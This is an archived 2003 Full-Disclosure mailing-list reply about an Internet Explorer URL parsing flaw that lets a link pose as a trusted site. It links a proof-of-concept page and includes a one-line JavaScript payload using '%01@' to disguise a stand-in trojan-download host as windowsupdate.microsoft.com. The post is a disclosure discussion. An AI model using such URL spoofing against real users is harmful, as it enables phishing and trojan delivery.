[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
From: S G Masood <sgmasood@yahoo.com>
Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST)

LOL. This is so simple and dangerous, it almost made
me laugh and cry at the same time. Most of you will
realise why...;D 
The Paypal, AOL, Visa, Mastercard, et al email
scammers will have a harvest of gold this month with
lots of zombies falling for this simple technique.

># POC ##########
>http://www.zapthedingbat.com/security/ex01/vun1.htm

Dont be surprised if your latest download from
http://www.microsoft.com turns out to be a trojan!

location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com);


--
S.G.Masood

Hyderabad,
India

PS: One more thing - no scripting required to exploit this.

__________________________________
Do you Yahoo!?
Free Pop-Up Blocker - Get it now
http://companion.yahoo.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
  - From: "Clint Bodungen" <clint@secureconsulting.com>
- Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
  - From: "S . f . Stover" <attica@stackheap.org>

Prev by Date: [Full-Disclosure] List Charter
Next by Date: [Full-Disclosure] FWD: Internet Explorer URL parsing vulnerability
Previous by thread: [Full-Disclosure] List Charter
Next by thread: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Index(es):
- Date
- Thread